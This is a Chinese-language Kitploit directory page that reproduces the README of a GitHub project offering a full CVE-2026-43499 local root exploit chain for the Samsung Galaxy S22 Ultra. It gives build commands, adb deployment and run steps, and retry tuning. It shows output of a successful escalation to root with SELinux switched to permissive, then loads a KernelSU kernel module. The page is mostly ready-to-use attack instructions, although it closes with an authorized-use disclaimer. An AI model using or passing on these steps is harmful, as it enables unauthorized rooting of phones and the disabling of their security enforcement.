Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
IonStack-S22U — CVE-2026-43499 完整漏洞利用链,适用于三星 Galaxy S22 Ultra(Android 5.10 内核) | Kitploit
工具/GitHubGitHub/sarabpal-dev/ionstack-s22u
Android安全权限提升漏洞利用后渗透利用移动安全二进制利用
GitHubsarabpal-dev/ionstack-s22u

IonStack-S22U

CVE-2026-43499 完整漏洞利用链,适用于三星 Galaxy S22 Ultra(Android 5.10 内核)

查看仓库
41719小时48分前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-43499 - Galaxy S22 Ultra

https://github.com/user-attachments/assets/f3d0858d-f8f5-444f-8ae5-541c2bc744c3

本仓库包含 CVE-2026-43499 漏洞利用针对三星 Galaxy S22 Ultra(SM-S908W)的设备专属移植版本。

支持的目标设备

root@kitploit:~
Device: Samsung Galaxy S22 Ultra (SM-S908W)
Codename: b0q
Android: 15 / SDK 35
Build number: AP3A.240905.015.A2.S908WVLS8FYG7
Build display ID: AP3A.240905.015.A2.S908WVLS8FYG7
Build fingerprint: samsung/b0qcsx/b0q:15/AP3A.240905.015.A2/S908WVLS8FYG7:user/release-keys
Kernel: 5.10.226-android12-9-30958166-abS908WVLS8FYG7
Architecture: aarch64

本仓库中的偏移量和结构体布局仅适用于上述固件。此目标配置不支持其他型号和固件版本。

参考来源

本移植基于以下已发布的漏洞利用实现:

  • NebuSec/CyberMeowfia — IonStack/CVE-2026-43499/exploit
  • BuSung-dev/CVE-2026-43499-S25U
  • 用作移植基础的上游修订版本:b850d3bddc74c3328d5fbcc0568d21962b55d949

特别感谢:

  • F-19-F/IonStackQuest3

上游的 Apache License 2.0 保留在 LICENSE 中。

主要移植改动

  • 将漏洞利用从 v6.6 内核(Galaxy S25 Ultra)移植到 Android v5.10 内核(Galaxy S22 Ultra / b0q)。
  • 新增了 b0q / S908WVLS8FYG7 目标偏移量(src/targets/S908WVLS8FYG7/target.h)及内核结构体布局。
  • 用 exp32 路线替代了 pselect 竞态:futex 编排、32 位栈标记及 sched_setattr 在嵌入式 32 位子阶段(src/exp32/)中运行。
  • 为三星内核新增了基于 tracefs 的 KASLR slide 自动恢复。
  • 为 v5.10 移植了伪造的 PI waiter/task 布局、CFI/FOPS 阶段以及物理读写原语。
  • 新增了 KDP 安全的 system_unbound_wq 用户态辅助程序(user-mode helper)提权路径,并将运行时 SELinux 强制执行目标更新为 selinux_state.enforcing。
  • 在 /data/local/tmp/cve-2026-43499-root 处新增了基于 socket 的 root 命令辅助程序。
  • 在建立任意读写原语后立即恢复全局 ashmem FOPS 指针。
  • 成功后将回收的页保留在独立的 cve43499-hold 进程中,以防悬空的内核引用被回收进无关的 slab 对象。
  • 在独立的子进程中运行失败的竞态尝试,并使用针对设备调优的延迟序列自动重试。

构建

将 ANDROID_NDK_HOME 设置为 Android NDK r27 或更高版本(或兼容的工具链),然后运行:

root@kitploit:~
make PROJECT=S908WVLS8FYG7 clean preload root-helper

要为运行 Android 内核且使用 Buildroot 文件系统的 QEMU 环境构建:

  • Buildroot 工具链版本:从 sarabpal-dev/qemu Release (samsung-v1) 下载工具链
  • QEMU 内核执行指南:设置与运行指南见 QEMU Samsung README
root@kitploit:~
make USE_BUILDROOT=1 PROJECT=S908WVLS8FYG7 clean preload root-helper

构建产物:

root@kitploit:~
build/S908WVLS8FYG7/bin/cve-2026-43499
build/S908WVLS8FYG7/bin/cve-2026-43499-root
build/S908WVLS8FYG7/bin/cve-exp32

部署

root@kitploit:~
adb push build/S908WVLS8FYG7/bin/cve-2026-43499 /data/local/tmp/cve-2026-43499
adb push build/S908WVLS8FYG7/bin/cve-2026-43499-root /data/local/tmp/cve-2026-43499-root
adb push build/S908WVLS8FYG7/bin/cve-exp32 /data/local/tmp/cve-exp32
adb shell chmod 755 /data/local/tmp/cve-2026-43499 /data/local/tmp/cve-2026-43499-root /data/local/tmp/cve-exp32

运行

执行漏洞利用阶段以启动 root 守护进程:

root@kitploit:~
adb shell "LD_PRELOAD=/data/local/tmp/cve-2026-43499 sh"

成功后,可从设备上的任意位置弹出交互式 root shell:

root@kitploit:~
adb shell "/data/local/tmp/cve-2026-43499-root"

或直接执行 root 命令:

root@kitploit:~
adb shell "/data/local/tmp/cve-2026-43499-root -c 'id'"

默认运行最多进行 16 次独立尝试。每次失败的子进程会在下一次尝试前退出,因此其文件描述符和堆整形(heap-shaping)分配会被释放,而不会累积在单个长驻的漏洞利用进程中。默认基础延迟为 20000 微秒,监管进程会将以下序列扫描两遍:

root@kitploit:~
20000, 30000, 50000, 25000, 40000, 15000, 60000, 35000

在收集时序数据时,可覆盖尝试次数或基础延迟:

root@kitploit:~
adb shell "EXPLOIT_ATTEMPTS=24 PSELECT_DELAY_USEC=20000 LD_PRELOAD=/data/local/tmp/cve-2026-43499 sh"

在 S908WVLS8FYG7 上已验证的结果:

root@kitploit:~
[*] root umh result wake=1 complete=1 retval=0 socket=1
[+] pipe-physrw-summary pid=5011 done=1 root=1 kaslr=1 base=ffffffc0080d8000 slide=00000000000d8000
[+] pipe physrw pid=5011 done=1 root=1 kaslr=1 read_ok=1 write_ok=1 rw64=1/1 uid=2000->0
[+] stability keeper pid=28206 retaining reclaimed kernel pages
[+] exploit completed attempt=1/16

交互式 root shell 会话:

root@kitploit:~
b0q:/data/local/tmp $ ./cve-2026-43499-root                              
:/ # id
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
:/ # getenforce
Permissive

初始阶段基于竞态。以 root=0 退出的子进程会被自动重试。执行成功后,将恢复 ashmem_misc.fops,把 SELinux 切换为 permissive 模式,并启动 root 辅助守护进程,直到下次重启。

通过 KernelSU-Next 实现持久化 root

上述漏洞利用仅在当前启动周期内持有 root 权限。若要在本次会话剩余时间内获得 Manager 应用和 su 风格的控制权限,请通过 root 辅助程序将 KernelSU-Next 作为后期加载的内核模块加载。

  1. 从 v3.3.0-android12-5.10 下载两个发布资源:

    • KernelSU_Next_v3.3.0-release.apk — Manager 应用
    • kernelsu-android12-5.10.ko — LKM 内核模块
  2. 安装 Manager APK:

root@kitploit:~
adb install KernelSU_Next_v3.3.0-release.apk
  1. 推送模块,并通过上面获得的 root 辅助程序加载它:
root@kitploit:~
adb push kernelsu-android12-5.10.ko /data/local/tmp/kernelsu-android12-5.10.ko
adb shell "/data/local/tmp/cve-2026-43499-root -c 'insmod /data/local/tmp/kernelsu-android12-5.10.ko'"
  1. 打开设备上的 KernelSU Next 应用——它应能检测到已加载的模块,并开放超级用户管理、模块/Zygisk 支持以及 ksud soft-reboot 功能。

由于这是后期加载的 LKM(而非打过补丁的 boot 镜像),它无法在重启后存续——每次设备重启后,你都需要重新运行漏洞利用并重新 insmod 该模块。

[!WARNING] 可靠性与内核崩溃(Kernel Panic)提示: 竞态阶段对时序非常敏感,目前并不可靠——在大多数运行中可能会失败或导致内核崩溃。请保持耐心,干净启动(clean boot)的成功率更高。未来可能会发布优化版本以提高可靠性。

[!TIP] 稳定性与成功率建议:

  • 重启设备:为获得最高成功率,请在运行漏洞利用前重启设备,以确保 slab/堆处于干净状态。
  • 关闭后台应用:确保所有后台应用均已关闭。
  • 解锁屏幕并保持闲置:在漏洞利用运行期间保持设备解锁,不要操作或使用手机,因为活跃的用户输入/后台任务可能干扰时序,并可能触发内核崩溃。

仅可在您拥有或已获明确授权测试的设备上使用。

下载工具